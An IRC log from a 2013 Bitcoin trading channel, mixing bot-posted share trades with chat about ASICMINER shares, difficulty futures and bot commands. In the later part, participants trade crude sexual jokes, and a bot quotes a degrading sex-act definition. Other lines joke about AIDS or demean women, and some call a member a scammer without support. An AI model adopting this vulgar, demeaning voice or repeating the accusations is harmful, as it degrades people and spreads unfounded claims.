[+] Jun 25 23:05:57 [BTCTC] [ASICMINER-PT] 4 @ 3.4 = 13.6 BTC [+] Jun 25 23:05:59 others might call the super cruel as super idiots Jun 25 23:06:15 or, Jun 25 23:06:18 candid Jun 25 23:06:40 Anyone selling direct AM shares? Jun 25 23:06:43 sure Jun 25 23:06:47 how many you need Jun 25 23:07:03 and what's your offer price Jun 25 23:07:23 depends on the price obviously, but I'd like to get 9 for now and then some more over time. Jun 25 23:07:23 Whatever TAT's selling em for, I'll sell for higher Jun 25 23:08:05 Are you ok with selling such a small quantity? Jun 25 23:08:15 10 minimum normally Jun 25 23:08:19 but for the right price... Jun 25 23:08:29 haha, now what's the right price :D. Jun 25 23:08:45 direct shares would be sold at a premium to highest exchange price Jun 25 23:08:50 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.005792 = 0.5792 BTC [-] Jun 25 23:09:23 what is the advantage of direct? HW sales included or something like that? Jun 25 23:09:30 less risk Jun 25 23:09:31 or just skipping the middle man? Jun 25 23:09:46 les delays of receiving your divs Jun 25 23:09:49 I read something of usb stick miner givaways or something to direct owners or was that BS? Jun 25 23:09:53 that too Jun 25 23:09:59 that's real Jun 25 23:10:07 [BTCTC] [ASICMINER-PT] 1 @ 3.419 BTC [+] Jun 25 23:10:09 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [+] Jun 25 23:10:10 but only for people having lots of shares I guess? Jun 25 23:10:11 you can levereage you shares to buy sticks Jun 25 23:10:26 "If you are a shareholder of ASICMINER, you will have the privilege of paying later. You will have 15 days to pay after shipping. The maximum volume of USB sticks for this policy you enjoy is (share number / 3, rounded down). Your (USB number * 3) shares will be frozen, thus not trade-able, as collateral, till payment for the USB. If you fail to pay, the shares will be collected back Jun 25 23:10:26 by ASICMINER. The minimum volume requirement of 50 USB sticks still holds for shareholders." Jun 25 23:10:27 ah buy sticks with dividends or something like that? Jun 25 23:10:44 ah ok cool Jun 25 23:10:55 well I guess current bid price is something like 3.3? Jun 25 23:11:05 [16:10] <@assbot> [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [+] Jun 25 23:11:38 [BTCTC] [ASICMINER-PT] 1 @ 3.4149 BTC [-] Jun 25 23:11:40 [BTCTC] [ASICMINER-PT] 2 @ 3.414998 = 6.83 BTC [+] Jun 25 23:11:42 [BTCTC] [ASICMINER-PT] 1 @ 3.414999 BTC [+] Jun 25 23:11:46 [BTCTC] [ASICMINER-PT] 5 @ 3.415 = 17.075 BTC [+] Jun 25 23:11:48 [BTCTC] [DMS.MINING] 2 @ 0.020935 = 0.0419 BTC [-] Jun 25 23:11:49 [BTCTC] [ASICMINER-PT] 21 @ 3.42 = 71.82 BTC [+] Jun 25 23:11:54 lol ok assbot just told us for sure :p Jun 25 23:12:16 Hmm I'd really like them but price seems so steep Jun 25 23:12:22 so basically this is hwat this is. very low volume and people qwanting to buy oin credit pushi8ng it up Jun 25 23:12:53 other factors at play too Jun 25 23:13:00 but that's one Jun 25 23:13:01 ThickAsThieves I guess I have to pay 3.5 per share? Jun 25 23:13:31 [BTCTC] [ASICMINER-PT] 5 @ 3.2 = 16 BTC [-] Jun 25 23:13:51 [HAVELOCK] [VTX] 2 @ 0.426 = 0.852 BTC [+] Jun 25 23:13:52 [BTCTC] [ASICMINER-PT] 1 @ 3.3703 BTC [+] Jun 25 23:13:54 [BTCTC] [ASICMINER-PT] 2 @ 3.370201 = 6.7404 BTC [-] Jun 25 23:13:56 [BTCTC] [ASICMINER-PT] 2 @ 3.3701 = 6.7402 BTC [-] Jun 25 23:14:07 pm'd Jun 25 23:14:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 25 23:14:31 "23:08 (306) i'd sell all my sdice shares now if I had any. they haven't innovated anything in years" Jun 25 23:14:37 it actually barely is one year old. Jun 25 23:14:40 internet time. Jun 25 23:14:53 correction, bitcoin time. Jun 25 23:14:55 hehe Jun 25 23:15:27 i saw someone saying that gox accepted lib reserve many years ago Jun 25 23:15:36 bitcoin is so old now Jun 25 23:15:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.034 = 0.34 BTC [-] Jun 25 23:16:06 [HAVELOCK] [ASICM] 19 @ 0.0339 = 0.6441 BTC [+] Jun 25 23:18:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.034 = 0.068 BTC [-] Jun 25 23:19:28 [BTCTC] [DMS.MINING] 1 @ 0.020927 BTC [-] Jun 25 23:20:59 [HAVELOCK] [ASICM] 15 @ 0.034 = 0.51 BTC [+] Jun 25 23:21:44 totally. expecting the ppl with "decade's experience" to show up any moment nao. Jun 25 23:24:25 [MPEX] [X.IDIFF.SEP] 1018 @ 0.55 = 559.9 BTC [+] Jun 25 23:24:47 no one told me ^ Jun 25 23:24:51 :) Jun 25 23:28:10 [BTCTC] [TAT.ASICMINER] 11 @ 0.034 = 0.374 BTC [-] Jun 25 23:28:10 io hey Jun 25 23:29:54 more than double by end of sept.. Jun 25 23:30:22 Fucking BTC Exchange https://bitcointalk.org/index.php?topic=242783.0 Jun 25 23:32:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.033712 BTC [-] Jun 25 23:35:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.033711 = 0.3034 BTC [-] Jun 25 23:36:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03428 BTC [+] Jun 25 23:37:13 .h Jun 25 23:37:16 All commands can be processed in channel or in PM Jun 25 23:37:16 Commands: .bait .count .diff .earn .exchange .nethash .rates .lcrates .tslb Jun 25 23:37:39 .earn Jun 25 23:37:40 Usage: earn [hashrate_in_MH/s] Jun 25 23:37:40 -.- Jun 25 23:37:40 earn currently unavailable Jun 25 23:37:57 what is ozbot? Jun 25 23:38:12 scrat earn goes like this Jun 25 23:38:16 gribble wannabe Jun 25 23:38:18 .e 10000 Jun 25 23:38:18 At 10000 MH/s, you should earn 0.26004833 BTC/day ($26.73) on average (0.01083535 BTC/hr) Jun 25 23:39:52 heh. Jun 25 23:39:54 ;;genrate 10000 Jun 25 23:39:55 The expected generation output, at 10000.0 Mhps, given difficulty of 19339258.2724, is 0.260044366411 BTC per day and 0.0108351819338 BTC per hour. Jun 25 23:40:01 gribble lives! Jun 25 23:40:34 i found gribble a bit long winded, and thusly, ozbot was born Jun 25 23:41:03 ozbot. saving people keystrokes day after day. tm Jun 25 23:41:33 also, ozcoin needed a bot Jun 25 23:42:00 Ozbot - Less Keystrokes, More Fap Strokes Jun 25 23:42:02 .bait Jun 25 23:42:06 :D Jun 25 23:42:11 http://25.media.tumblr.com/tumblr_m9onu4bEw81rz1q6ko1_500.jpg Jun 25 23:44:52 [BTCTC] [ASICMINER-PT] 2 @ 3.416985 = 6.834 BTC [+] Jun 25 23:48:05 [HAVELOCK] [ASICM] 1 @ 0.03439889 BTC [+] Jun 25 23:51:47 [BTCTC] [DMS.SELLING] 14 @ 0.0345 = 0.483 BTC [+] Jun 25 23:51:49 [BTCTC] [DMS.SELLING] 4 @ 0.03575 = 0.143 BTC [+] Jun 25 23:51:50 ;;eauth Jun 25 23:51:50 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Jun 25 23:51:57 wait Jun 25 23:52:03 whats the IRC one? Jun 25 23:52:22 [BTCTC] [DMS.SELLING] 1 @ 0.03575 BTC [+] Jun 25 23:52:25 dunno :D Jun 25 23:54:04 nickserv? Jun 25 23:54:56 yeah Jun 25 23:56:13 can't i prove i am me w/o eauth? Jun 25 23:56:41 sort-of./ Jun 25 23:57:40 [BTCTC] [BASIC-MINING] 2 @ 1.560013 = 3.12 BTC [+] Jun 26 00:00:03 [HAVELOCK] [ASICM] 30 @ 0.034 = 1.02 BTC [-] Jun 26 00:01:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.033712 BTC [-] Jun 26 00:02:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.033711 BTC [-] Jun 26 00:02:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.033711 = 0.1348 BTC [-] Jun 26 00:02:38 [HAVELOCK] [ASICM] 50 @ 0.034 = 1.7 BTC [-] Jun 26 00:02:44 ThickAsThieves: you really want some X.IDIFF.SEP at that price? Jun 26 00:02:53 no Jun 26 00:02:55 :) Jun 26 00:03:09 well, maybe Jun 26 00:03:17 [BTCTC] [ASICMINER-PT] 2 @ 3.4179 = 6.8358 BTC [+] Jun 26 00:03:36 but i am a loyal coinbr diff customer Jun 26 00:03:41 mpex diffs are balls Jun 26 00:03:51 haha Jun 26 00:04:29 [HAVELOCK] [HIM] 3 @ 0.269999 = 0.81 BTC [+] Jun 26 00:04:43 mpex needs to just do it like you Jun 26 00:04:58 or Jun 26 00:05:07 they should just delete theirs Jun 26 00:05:12 and let you run yours there too Jun 26 00:05:37 i think they're fine, just asking for cover to be disclosed Jun 26 00:06:07 exact value, i mean Jun 26 00:06:33 they are cryptic Jun 26 00:06:39 yours are digestible Jun 26 00:07:20 isn't the only difference the price and timeframe? Jun 26 00:07:38 no Jun 26 00:07:58 the max payout is cryptically determined Jun 26 00:08:09 yes biggest difference is the cover.. mpex ones have it only approximately known Jun 26 00:08:30 of course you can assume it's the minimum Jun 26 00:08:35 and must Jun 26 00:08:50 but even then Jun 26 00:08:51 cmon now Jun 26 00:09:10 just state the damn cap Jun 26 00:09:11 lol, the minimum for X.IDIFF.SEP can be 0.4 if created before June Jun 26 00:09:24 heh Jun 26 00:09:45 i didnt know any existed til this week Jun 26 00:09:51 its all nonsense Jun 26 00:09:58 jurov's are clean Jun 26 00:10:05 no-nonsense Jun 26 00:11:29 ThickAsThieves http://trilema.com/2013/xidiffjun-has-settled/ Jun 26 00:11:35 historically they covered. Jun 26 00:11:44 [HAVELOCK] [ASICM] 10 @ 0.034 = 0.34 BTC [-] Jun 26 00:14:30 yes. Jun 26 00:14:32 If there will be steady churn of new chips, it will not cover. Jun 26 00:14:59 ThickAsThieves has a new fan https://bitcointalk.org/index.php?topic=99497.msg2578656#msg2578656 Jun 26 00:15:05 iDiff-E August already started selling at 0.0049 (it's equivalent to difficulty 49 million - I subdivided it by 100) Jun 26 00:15:08 seems like a nice guy Jun 26 00:15:14 so september is like..pfff Jun 26 00:15:49 dub, lol Jun 26 00:15:52 just what i need Jun 26 00:16:12 mebbe. Jun 26 00:16:31 mp, be more like jurov Jun 26 00:16:39 you know you wanna Jun 26 00:17:05 lol. how's that go ? Jun 26 00:17:09 he is a man of ideas! Jun 26 00:17:17 and has executed them! Jun 26 00:17:34 okay ThickAsThieves that's enough Jun 26 00:17:39 :) Jun 26 00:17:47 too much praise? Jun 26 00:18:12 yes Jun 26 00:18:40 plus, i seriously doubt this is a right argument to influence mp :DD Jun 26 00:18:50 that's the joke i guess Jun 26 00:19:21 lol but srsly. what, make them monthly ? Jun 26 00:19:43 are you familiar with Jurov's scheme? Jun 26 00:20:00 he runs two futures, Even Mos, Odd Mos Jun 26 00:20:06 settled one per month Jun 26 00:20:12 at current diff Jun 26 00:20:21 each has a published cover Jun 26 00:20:30 thats about it Jun 26 00:20:59 fairly elegant Jun 26 00:21:11 i'd say the only edit i'd have is the names Jun 26 00:21:21 are a bit awkward if you are unfamiliar Jun 26 00:21:43 which is only a nitpick Jun 26 00:21:53 he even lets you back them if you like Jun 26 00:22:25 hopw do you establish the published cover ? Jun 26 00:22:48 probly what amounts to arbitrarily Jun 26 00:22:50 but Jun 26 00:22:54 so how's it better ? Jun 26 00:23:00 i'm assuming he does his research Jun 26 00:23:05 to establish his risk Jun 26 00:23:08 [HAVELOCK] [HIM] 10 @ 0.255 = 2.55 BTC [-] Jun 26 00:23:12 and chooses Jun 26 00:23:12 so basically your objection is that i'm not doing enough research ?! Jun 26 00:23:33 we've discussed my objections at least twice Jun 26 00:23:37 and jurov the same Jun 26 00:23:38 [HAVELOCK] [VTX] 1 @ 0.425001 BTC [-] Jun 26 00:23:43 yea but it never came to anything. Jun 26 00:23:51 and won't today Jun 26 00:23:52 [BTCTC] [BTC-BOND] 19 @ 0.009998 = 0.19 BTC [+] Jun 26 00:24:07 dysfunctional arguments don't age like wine, as in you revisit them three months later and they've improved now. Jun 26 00:24:58 an argument isnt dysfunctional because one side says so Jun 26 00:25:25 this isn't a divorce proceeding, we're not equal parties to it. Jun 26 00:25:29 nope Jun 26 00:25:33 i'm ok with any result Jun 26 00:25:43 i didnt mean to debate this again Jun 26 00:25:53 just sorta happened Jun 26 00:26:15 :p Jun 26 00:26:22 i think the proof would be in the pudding on this one Jun 26 00:26:26 well im preparing the s.mg next statement Jun 26 00:26:28 Jurov's sell Jun 26 00:26:30 being EXTRA MEAN to people Jun 26 00:26:30 your don't Jun 26 00:26:33 yours* Jun 26 00:26:45 they've been crazy lately, you kidding ? Jun 26 00:27:28 ah Jun 26 00:27:32 didnt see that total Jun 26 00:27:48 i still think they'd sell better Jun 26 00:28:50 no way to see historic purchases? Jun 26 00:29:06 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005707 = 0.2854 BTC [-] Jun 26 00:29:07 parseval should add mpex to his chart site Jun 26 00:32:39 he didn't want to a few months ago. Jun 26 00:34:44 dont ask that! Jun 26 00:35:06 ;;later Jun 26 00:35:07 Error: "later" is not a valid command. Jun 26 00:35:09 jurov: ? Jun 26 00:35:23 ;;tell Jun 26 00:35:24 (tell ) -- Tells the whatever is. Use nested commands to your benefit here. Jun 26 00:35:26 not ging to create an asset every month Jun 26 00:35:46 ;;tell parseval can you add mpex? Jun 26 00:35:46 Error: I haven't seen parseval, I'll let you do the telling. Jun 26 00:35:56 whats the command Jun 26 00:35:57 Ukto, i mean your idea to spell out CoinBr Jun 26 00:36:07 would be better abbreviated Jun 26 00:36:09 [BTCTC] [BITVPS] 25 @ 0.00131 = 0.0328 BTC [-] Jun 26 00:36:15 i thought that part was your idea Jun 26 00:36:15 :P Jun 26 00:36:23 ;;later tell parseval Can you ad mpex to coinflow? Jun 26 00:36:23 The operation succeeded. Jun 26 00:36:26 booya Jun 26 00:36:40 Ukto: no hard feelings there Jun 26 00:36:58 and where's this parseval site? seems i missed it Jun 26 00:37:07 CoinBr is in the asset name why? Jun 26 00:37:16 www.coinflow.co Jun 26 00:37:25 he issues more than one asset. thus he needs a group Jun 26 00:37:30 why does yours say TAT. ? Jun 26 00:37:32 ah Jun 26 00:37:41 [BTCTC] [BITVPS] 20 @ 0.001301 = 0.026 BTC [-] Jun 26 00:37:47 represent yo Jun 26 00:37:53 CB.DIFF.FUTURE-E Jun 26 00:37:56 maybe? Jun 26 00:38:05 i dunno Jun 26 00:38:09 [BTCTC] [BITVPS] 100 @ 0.0013 = 0.13 BTC [-] Jun 26 00:38:14 not gonna change it now Jun 26 00:38:19 does it really make a diff? Jun 26 00:38:20 later then? Jun 26 00:38:22 not changing it now Jun 26 00:38:25 :) Jun 26 00:38:45 [BTCTC] [DMS.MINING] 9 @ 0.020928 = 0.1884 BTC [+] Jun 26 00:39:04 coinflow.co nor .com is it Jun 26 00:39:36 must be down Jun 26 00:39:39 [BTCTC] [DMS.MINING] 1 @ 0.020999 BTC [+] Jun 26 00:39:52 it's still under dev Jun 26 00:40:25 his bot isnt in channel either Jun 26 00:42:55 [BTCTC] [DMS.MINING] 100 @ 0.020718 = 2.0718 BTC [-] Jun 26 00:42:57 [BTCTC] [DMS.MINING] 10 @ 0.020716 = 0.2072 BTC [-] Jun 26 00:43:58 [BTCTC] [DMS.SELLING] 10 @ 0.033111 = 0.3311 BTC [-] Jun 26 00:43:59 [BTCTC] [DMS.SELLING] 1 @ 0.03311 BTC [-] Jun 26 00:44:01 [BTCTC] [DMS.SELLING] 82 @ 0.0331 = 2.7142 BTC [-] Jun 26 00:44:50 [BTCTC] [DMS.PURCHASE] 130 @ 0.053891 = 7.0058 BTC [-] Jun 26 00:47:28 [BTCTC] [BASIC-MINING] 1 @ 1.560002 BTC [-] Jun 26 00:47:43 [BTCTC] [BASIC-MINING] 1 @ 1.560001 BTC [-] Jun 26 00:48:33 parseval will be like "what, mpex ad?" Jun 26 00:48:47 (you missed one 'd') Jun 26 00:48:59 he's a smart guy Jun 26 00:49:02 i ave faith Jun 26 00:49:05 ! Jun 26 00:52:27 it isn't about being smart, quite many smart people can't stomach mp Jun 26 00:53:30 why? Jun 26 00:54:50 what's that to do with smart? Jun 26 00:55:19 [BTCTC] [B.YABMC] 1 @ 0.012 BTC [+] Jun 26 00:55:21 [BTCTC] [B.YABMC] 10 @ 0.0125 = 0.125 BTC [+] Jun 26 00:55:56 people can't stand being humiliated when they're wrong. Jun 26 00:56:08 this because that's the fastest way to learning anything, and people can't stand learning anything. Jun 26 00:56:20 alternatively i'm just an asshole and one of these days ima get what's comin' to me! Jun 26 00:57:03 [BTCTC] [BITVPS] 8 @ 0.00125 = 0.01 BTC [-] Jun 26 00:57:19 [BTCTC] [BITVPS] 20 @ 0.00122 = 0.0244 BTC [-] Jun 26 00:58:29 truffles: can't see the connection between long term strategy and avoiding information Jun 26 00:58:40 [BTCTC] [BITVPS] 10 @ 0.001215 = 0.0122 BTC [-] Jun 26 00:59:06 you are going to hit a tree and your car catch fire and burn where there is no fuel source Jun 26 00:59:06 [BTCTC] [BITVPS] 10 @ 0.001214 = 0.0121 BTC [-] Jun 26 00:59:23 [BTCTC] [BITVPS] 100 @ 0.001212 = 0.1212 BTC [-] Jun 26 00:59:36 my money is on boating accident Jun 26 00:59:44 [BTCTC] [BITVPS] 100 @ 0.00121 = 0.121 BTC [-] Jun 26 00:59:47 seeing how i don't boat and there's no water nearby. Jun 26 00:59:56 or your boat catch on fire and the fiberglass burns with no fuel source Jun 26 01:00:08 that is what I am referncing Jun 26 01:00:14 sp Jun 26 01:00:20 [BTCTC] [BITVPS] 100 @ 0.0012 = 0.12 BTC [-] Jun 26 01:01:42 23:52 < truffles> if they can avoid him they will hehe Jun 26 01:01:53 [BTCTC] [BITVPS] 300 @ 0.001131 = 0.3393 BTC [-] Jun 26 01:02:03 parseval is trying to build a hub of chart info Jun 26 01:02:23 would be stupid to let mp's personality mess with that Jun 26 01:02:40 fact is, mpex trades stuff Jun 26 01:02:51 and that's enough relevance Jun 26 01:03:40 ThickAsThieves: how would mp's personality mess with that, exactly? Jun 26 01:04:19 he can get even data feed from third parties Jun 26 01:04:26 [BTCTC] [DMS.MINING] 1 @ 0.021496 BTC [+] Jun 26 01:04:28 my personalitah! Jun 26 01:04:44 mircea_popescu: people can't stand humiliation because of failure? Jun 26 01:04:45 http://24.media.tumblr.com/tumblr_lvde0usdsA1r653xto1_500.jpg Jun 26 01:04:50 you will respect my autoritah!!! Jun 26 01:04:54 Isn't failure the number one way to learning something? Jun 26 01:04:57 i mean personalitah. Jun 26 01:05:07 thestringpuller well, failure per se is the number 2. Jun 26 01:05:23 the number 1 is someone telling you " you failed because you did x y z wrong, not because yo uwere "unlucky" Jun 26 01:05:32 which really messes with people. as they'd much prefer to have been unlucky. Jun 26 01:05:41 pulling luck out of the equation Jun 26 01:05:57 [BTCTC] [TAT.ASICMINER] 29 @ 0.034192 = 0.9916 BTC [+] Jun 26 01:06:01 when you fuck up you should be able to say, "oh well this is why the bomb exploded and everyone died under my command" Jun 26 01:06:15 heh, I can see mp being featured on south park Jun 26 01:06:35 I think the deeper point is people don't like being humiliated because they don't like taking responsibility Jun 26 01:06:48 jborkl as who ? Jun 26 01:08:50 your own charachter Jun 26 01:09:01 [BTCTC] [ASICMINER-PT] 1 @ 3.37172 BTC [-] Jun 26 01:09:28 you are quite entertaining, you would make a good charachter Jun 26 01:09:57 even as a cutout ? Jun 26 01:10:02 [BTCTC] [ASICMINER-PT] 1 @ 3.3719 BTC [+] Jun 26 01:10:07 and I am sure we can find some bitcon-dev fatass to be cartman when he was playing WOW Jun 26 01:10:12 "come see mp become what he most despises : a cutout entrepreneur" Jun 26 01:11:24 https://bitcointalk.org/index.php?topic=241302.msg2579181#msg2579181 Jun 26 01:11:27 Naw, you could just be you - have a few bitches in a dungeon , swimming in some bitcoins Jun 26 01:11:28 the most recent from evil, in. Jun 26 01:11:28 2013-06-23 Forbes - Bitcoin Foundation Receives Cease And Desist Order From Ca Jun 26 01:11:45 jborkl i think it may be too much for tv. Jun 26 01:12:38 Well, when you are smart I notice normal people think you have a odd sense of humor Jun 26 01:12:55 it is because they just do not understand fast enough Jun 26 01:14:46 [BTCTC] [BASIC-MINING] 1 @ 1.560003 BTC [+] Jun 26 01:15:05 lol Jun 26 01:15:35 MP Jun 26 01:15:36 you Jun 26 01:15:39 you are cray cray Jun 26 01:16:19 reading "perfect money" makes me realize MPOE-PR must be an amazon to work with you Jun 26 01:17:00 [BTCTC] [ASICMINER-PT] 1 @ 3.404 BTC [+] Jun 26 01:17:01 she is kinda an amazon actually Jun 26 01:17:04 they all are. Jun 26 01:19:51 [BTCTC] [GSDPT] 2 @ 0.00247 = 0.0049 BTC [-] Jun 26 01:21:11 [BTCTC] [GSDPT] 7 @ 0.00248 = 0.0174 BTC [+] Jun 26 01:21:14 [BTCTC] [GSDPT] 41 @ 0.00248 = 0.1017 BTC [+] Jun 26 01:21:30 so where did this chat take place mr. popescu? Jun 26 01:22:39 on irc. Jun 26 01:22:58 it was like 15 minutes old when i posted it. Jun 26 01:23:59 so Jun 26 01:24:10 Im very interested in those new 9000 series radeons Jun 26 01:24:12 [BTCTC] [ASICMINER-PT] 1 @ 3.4089 BTC [+] Jun 26 01:24:31 [BTCTC] [COGNITIVE] 1 @ 0.359729 BTC [+] Jun 26 01:25:23 [BTCTC] [TAT.ASICMINER] 29 @ 0.03417 = 0.9909 BTC [-] Jun 26 01:28:13 [BTCTC] [DMS.PURCHASE] 50 @ 0.053891 = 2.6946 BTC [-] Jun 26 01:28:25 no dates mr. popescu Jun 26 01:28:27 err Jun 26 01:28:29 no timestamps Jun 26 01:28:33 date only on your posts Jun 26 01:32:32 sure there are ? Jun 26 01:32:38 a timestamps. yeash, date only. Jun 26 01:32:43 you can see the time on rss tho Jun 26 01:33:07 01:31 (472) https://bitcointalk.org/index.php?topic=242962.msg2579287#msg2579287 << how does it feel to have the community basically do a http://trilema.com/wp-content/uploads/2011/08/cold-ownage.jpg on you ? Jun 26 01:33:07 01:31 (1) I like it :) Jun 26 01:34:48 wtf Jun 26 01:35:06 I can tell by the suit thats a mp-foot Jun 26 01:35:24 what the fuck is that white shit Jun 26 01:35:51 looks like bird shit Jun 26 01:35:55 lol Jun 26 01:36:21 [BTCTC] [TAT.ASICMINER] 24 @ 0.034245 = 0.8219 BTC [+] Jun 26 01:37:52 that or its a high speed shot of some mp-spooge flying out a nose-pr, angry dragon style Jun 26 01:38:02 I informed the AM masses of just-dice.com https://bitcointalk.org/index.php?topic=235763.msg2579293#msg2579293 Jun 26 01:38:09 ;;ud angry dragon Jun 26 01:38:09 http://www.urbandictionary.com/define.php?term=angry%20dragon | Immediately after you blow your load in a girl's mouth, smack the back of her head and make it come out her nose. When she gets up she'll look like... Jun 26 01:38:11 Urban Dictionary: angry dragon Jun 26 01:38:41 dub some club Jun 26 01:39:11 is it called the Everone Has AIDS club? Jun 26 01:39:37 pretty much Jun 26 01:39:48 some hole in the wall thing, no cover, cockfest. Jun 26 01:40:36 i think the wallpaint was flaking on there Jun 26 01:41:03 [BTCTC] [TAT.ASICMINER] 33 @ 0.034245 = 1.1301 BTC [+] Jun 26 01:42:18 [BTCTC] [DMS.MINING] 5 @ 0.021457 = 0.1073 BTC [-] Jun 26 01:42:53 they are man feet Jun 26 01:42:53 mircea_popescu: sent you a pm Jun 26 01:42:58 what do you want Jun 26 01:43:13 [BTCTC] [DMS.SELLING] 1 @ 0.035747 BTC [+] Jun 26 01:43:40 all feet look gross Jun 26 01:43:54 girl feet can be hawt. Jun 26 01:44:00 dude feet meh Jun 26 01:46:30 girl feet are attached to vagina Jun 26 01:47:57 wat Jun 26 01:48:12 you can have both yknow Jun 26 01:48:16 it's okay Jun 26 01:48:47 food is better than vagoo? Jun 26 01:48:51 [HAVELOCK] [ASICM] 290 @ 0.034 = 9.86 BTC [-] Jun 26 01:52:26 random thought Jun 26 01:52:43 worst missed investment opportunity of the year Jun 26 01:52:50 AM not buying their own shares back? Jun 26 01:53:47 you'd think so. Jun 26 01:54:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00571 BTC [+] Jun 26 01:56:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.034244 = 1.7122 BTC [-] Jun 26 01:58:01 http://imgur.com/Zdaf5zI << girl gets fucked by just-dice Jun 26 01:58:02 imgur: the simple image sharer Jun 26 01:58:42 [BTCTC] [GSDPT] 1 @ 0.00248 BTC [+] Jun 26 02:01:20 lol Jun 26 02:01:56 must not click mp links at work Jun 26 02:02:06 [BTCTC] [BITVPS] 1 @ 0.001199 BTC [+] Jun 26 02:02:22 [BTCTC] [TAT.VIRTUALMINE] 350 @ 0.005366 = 1.8781 BTC [-] Jun 26 02:02:40 you're new here i gather Jun 26 02:06:48 [BTCTC] [DMS.PURCHASE] 40 @ 0.053891 = 2.1556 BTC [-] Jun 26 02:09:09 [HAVELOCK] [ASICM] 5 @ 0.034 = 0.17 BTC [-] Jun 26 02:16:25 hellohello Jun 26 02:17:01 To open account on mpex without fee or reduced fee? Jun 26 02:17:16 [BTCTC] [BITVPS] 40 @ 0.00113 = 0.0452 BTC [-] Jun 26 02:17:18 [BTCTC] [BITVPS] 1 @ 0.00113 BTC [-] Jun 26 02:17:39 reggin you can get 5 btc off if you use an existing member's fingerprint Jun 26 02:17:40 you accidentally a word there Jun 26 02:18:41 no fee coinbr| Jun 26 02:18:50 work? Jun 26 02:19:25 [BTCTC] [BITVPS] 35 @ 0.00112 = 0.0392 BTC [-] Jun 26 02:19:44 sure. Jun 26 02:21:15 [BTCTC] [BASIC-MINING] 1 @ 1.560002 BTC [-] Jun 26 02:21:35 [BTCTC] [BASIC-MINING] 1 @ 1.560001 BTC [-] Jun 26 02:21:58 [BTCTC] [DMS.PURCHASE] 125 @ 0.053891 = 6.7364 BTC [-] Jun 26 02:28:33 is anyone aware of a bitcoin auditing service? Jun 26 02:29:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.033751 = 0.2025 BTC [-] Jun 26 02:30:09 as in doing what specifically ? Jun 26 02:31:12 well, say you enter into a relationship with someone where they guarantee a payout to you proportionate to the sum of payments into an address Jun 26 02:31:27 an email upon breach of contract would probably be nice, neh? Jun 26 02:32:37 i guess Jun 26 02:32:43 not sure anyone offers this atm. Jun 26 02:33:46 my research turned up nothing either Jun 26 02:34:18 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Jun 26 02:35:28 sounds pretty easy to do Jun 26 02:38:07 also pretty useless. by the time they notice you notice Jun 26 02:38:10 i imagine Jun 26 02:38:39 could be amarket Jun 26 02:38:46 [BTCTC] [ASICMINER-PT] 1 @ 3.409 BTC [+] Jun 26 02:38:47 for blockchain auditing? never. Jun 26 02:38:59 >9000 retarded AM investors that would pay for an email the second divs drop Jun 26 02:39:10 just so they can be first to spam the thread Jun 26 02:40:26 am investors paying for something ?! Jun 26 02:41:18 blockchain.info will beep at you when new txns hit an address Jun 26 02:41:44 im sure they could be persuaded to add an email me widget Jun 26 02:43:04 but like 'tail -f ~/.bitcoin/debug/log | grep | mail blah blah' as easily Jun 26 02:43:25 [BTCTC] [S.DICE-PT] 1 @ 0.00237 BTC [+] Jun 26 02:44:22 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [+] Jun 26 02:45:00 uyea srsly Jun 26 02:45:34 [BTCTC] [S.DICE-PT] 1 @ 0.00238 BTC [+] Jun 26 02:46:57 [HAVELOCK] [ASICM] 3 @ 0.034 = 0.102 BTC [-] Jun 26 02:49:14 market of people who can in2 terminal is like 0.01% of internet Jun 26 02:49:56 100% of internet, 0.001% of web. Jun 26 02:50:07 zing Jun 26 02:50:18 semantics Jun 26 02:50:38 >D Jun 26 02:50:48 well lets do a startup! Jun 26 02:50:53 why bother Jun 26 02:50:57 clients pay for software Jun 26 02:51:04 quick, to the css mobile Jun 26 02:51:13 quick, to the mobile css ;) Jun 26 02:51:37 yer, I provide bash one line, you do css, ???, profit, etc Jun 26 02:51:49 people with money hate writing software Jun 26 02:52:08 people with little money can't write software Jun 26 02:52:22 true that, theres like >8998 things I've thought of doing but dont becausecan't be fucked Jun 26 02:52:40 [BTCTC] [ASICMINER-PT] 1 @ 3.4001 BTC [-] Jun 26 02:53:07 neat thing about making computerstuff is that it's generally repurposeable. Jun 26 02:53:20 [BTCTC] [ASICMINER-PT] 1 @ 3.4001 BTC [-] Jun 26 02:53:32 [BTCTC] [ASICMINER-PT] 1 @ 3.4177 BTC [+] Jun 26 02:54:22 [BTCTC] [ASICMINER-PT] 1 @ 3.4178 BTC [+] Jun 26 02:55:47 they can learn how to make money Jun 26 02:56:30 pretty much Jun 26 02:56:43 [BTCTC] [BASIC-MINING] 2 @ 1.599961 = 3.1999 BTC [+] Jun 26 02:56:45 [BTCTC] [BASIC-MINING] 1 @ 1.599974 BTC [+] Jun 26 02:56:46 [BTCTC] [BASIC-MINING] 1 @ 1.6 BTC [+] Jun 26 02:56:48 I did it Jun 26 02:56:59 trader in a bull market Jun 26 02:57:11 gave up on what I trained in, sat at home and learned how to internet Jun 26 02:57:20 now I earn 6 figures makeing internet Jun 26 02:57:29 what *did* you train in, dub? Jun 26 02:57:29 just scam people like mircea does with mpex Jun 26 02:57:31 for global megacorps Jun 26 02:57:38 benkay: cooking Jun 26 02:57:48 oh good call Jun 26 02:57:53 what kind of internets do you bake now? Jun 26 02:58:01 I figured bitches like a good cook Jun 26 02:58:11 professional bitcoin scammer can easily make 6 figures Jun 26 02:58:31 